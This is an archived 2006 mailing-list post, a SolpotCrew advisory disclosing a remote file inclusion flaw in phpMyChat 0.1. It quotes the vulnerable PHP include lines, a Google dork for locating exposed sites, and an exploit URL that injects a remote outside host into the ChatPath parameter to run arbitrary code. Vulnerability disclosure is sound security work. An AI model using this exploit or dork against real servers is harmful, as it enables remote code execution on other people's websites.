Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]

SolpotCrew Advisory #13 - phpMyChat 0.1 (ChatPath) Remote File Inclusion

Subject: SolpotCrew Advisory #13 - phpMyChat 0.1 (ChatPath) Remote File Inclusion
Date: 26 Sep 2006 06:28:08 -0000
#############################SolpotCrew 
Community################################
#
#  phpMyChat 0.1 (ChatPath) Remote File Inclusion 
#
#  vendor : http://www.phpheaven.net/phpmychat:home
#
#################################################################################
#
#
#       Bug Found By :Solpot a.k.a (k. Hasibuan) (26-09-2006)
#
#       contact: chris_hasibuan@yahoo.com 
# 
#       Website : http://www.nyubicrew.org/adv/solpot-adv-09.txt
#
################################################################################
#
#
#      Greetz: choi , h4ntu , Ibnusina , r4dja , No-profile , begu , madkid
#              robby , Matdhule , setiawan , m3lky , NpR , Fungky , barbarosa
#              home_edition2001 , Rendy , cow_1seng , ^^KaBRuTz , bYu , 
Lappet-homo
#              Blue|spy , cah|gemblung , Slacky , blind_boy , camagenta , XdikaX
#              x-ace , Dalmet , th3sn0wbr4in , iFX , ^YoGa^ , Soey , vend3r , 
k1tk4t
#              [K]ompoR_Meledu[K] , Scr3W_W0rM , TOMMY^PENGAMEN , Belaj4r, 
^NakKuta            
#              and all member solpotcrew community @ http://nyubicrew.org/forum/
#              especially thx to str0ke @ milw0rm.com
#
###############################################################################
Input passed to the "ChatPath" is not properly verified  
before being used to include files. This can be exploited to execute  
arbitrary PHP code by including files from local or external resources.  

code from lib/connected_users.lib.php3

<?php
require("${ChatPath}config/config.lib.php3");
require("${ChatPath}lib/database/".C_DB_TYPE.".lib.php3");
require("${ChatPath}lib/clean.lib.php3");

function display_connected($Private,$Full,$String1,$String2)

Google Dork : inurl:register.php3?L=

Exploit : 
http://somehost/path_to_phpMyChat/lib/connected_users.lib.php3?ChatPath=http://injek-pala-lappet?

##############################MY LOVE JUST FOR U RIE#########################  
######################################E.O.F################################## 



<Prev in Thread] Current Thread [Next in Thread>
  • SolpotCrew Advisory #13 - phpMyChat 0.1 (ChatPath) Remote File Inclusion, chris_hasibuan <=